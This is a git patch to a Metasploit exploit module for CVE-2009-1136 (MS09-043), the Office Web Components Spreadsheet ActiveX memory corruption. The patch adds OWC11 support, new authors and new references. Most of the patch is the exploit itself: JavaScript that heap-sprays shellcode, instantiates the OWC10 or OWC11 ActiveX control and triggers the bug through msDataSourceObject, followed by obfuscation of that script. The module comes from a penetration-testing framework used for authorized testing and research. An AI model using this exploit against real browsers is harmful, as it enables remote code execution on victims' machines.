From 786ccb3d5f1a51bd244cddafa8b12d91e093ab2c Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Tue, 20 Jul 2010 06:24:19 +0000 Subject: [PATCH] add support for OWC11 (from DSR!) git-svn-id: file:///home/svn/framework3/trunk@9883 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/browser/ms09_043_owc_msdso.rb | 81 ++++++++++--------- 1 file changed, 45 insertions(+), 36 deletions(-) diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index f4f3855039..a1959251e7 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -21,19 +21,21 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption', 'Description' => %q{ - This module exploits a memory corruption vulnerability within the Office Web Component - Spreadsheet ActiveX control. This module was based on an exploit found in - the wild. + This module exploits a memory corruption vulnerability within versions 10 and 11 of + the Office Web Component Spreadsheet ActiveX control. This module was based on + an exploit found in the wild. }, 'License' => MSF_LICENSE, - 'Author' => ['unknown','hdm'], + 'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! ' ], 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1136' ], - [ 'OSVDB', '55806'], + [ 'OSVDB', '55806' ], [ 'MSB', 'MS09-043' ], - [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ], + [ 'URL', 'http://ahmed.obied.net/software/code/exploits/ie_owc.py' ], + [ 'URL', 'http://www.exploit-db.com/exploits/9163/' ], + # broken: [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ], [ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ], ], 'DefaultOptions' => @@ -49,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] # other exploits use 0x0b0c0b0c ], 'DisclosureDate' => 'Jul 13 2009', 'DefaultTarget' => 0)) @@ -74,48 +76,55 @@ class Metasploit3 < Msf::Exploit::Remote retaddr = Rex::Text.to_unescape([target.ret].pack('V')) js = %Q| +var xshellcode = unescape("#{shellcode}"); - var xshellcode = unescape("#{shellcode}"); +var xarray = new Array(); +var xls = 0x81000-(xshellcode.length*2); +var xbigblock = unescape("#{retaddr}"); - var xarray = new Array(); - var xls = 0x81000-(xshellcode.length*2); - var xbigblock = unescape("#{retaddr}"); +while( xbigblock.length < xls / 2) { xbigblock += xbigblock; } +var xlh = xbigblock.substring(0, xls / 2); +delete xbigblock; - while( xbigblock.length < xls / 2) { xbigblock += xbigblock; } - var xlh = xbigblock.substring(0, xls / 2); - delete xbigblock; +for(xi=0; xi<0x99*2; xi++) { + xarray[xi] = xlh + xlh + xshellcode; +} - for(xi=0; xi<0x99*2; xi++) { - xarray[xi] = xlh + xlh + xshellcode; - } +CollectGarbage(); - CollectGarbage(); +var xobj; +try { + xobj = new ActiveXObject("OWC10.Spreadsheet"); +} catch(err) { + try { + xobj = new ActiveXObject("OWC11.Spreadsheet"); + } catch(err) { + } +} - var xobj = new ActiveXObject("OWC10.Spreadsheet"); +xe = new Array(); +xe.push(1); +xe.push(2); +xe.push(0); +xe.push(window); - xe = new Array(); - xe.push(1); - xe.push(2); - xe.push(0); - xe.push(window); +for(xi=0; xi < xe.length; xi++){ + for(xj=0; xj<10; xj++){ + try { xobj.Evaluate(xe[xi]); } catch(e) { } + } +} - for(xi=0; xi < xe.length; xi++){ - for(xj=0; xj<10; xj++){ - try { xobj.Evaluate(xe[xi]); } catch(e) { } - } - } +window.status = xe[3] + ''; - window.status = xe[3] + ''; - - for(xj=0; xj<10; xj++){ - try{ xobj.msDataSourceObject(xe[3]); } catch(e) { } - } - | +for(xj=0; xj<10; xj++){ + try{ xobj.msDataSourceObject(xe[3]); } catch(e) { } +} +| # Obfuscate it up a bit js = obfuscate_js(js, 'Symbols' => { - 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj} + 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj err} } ).to_s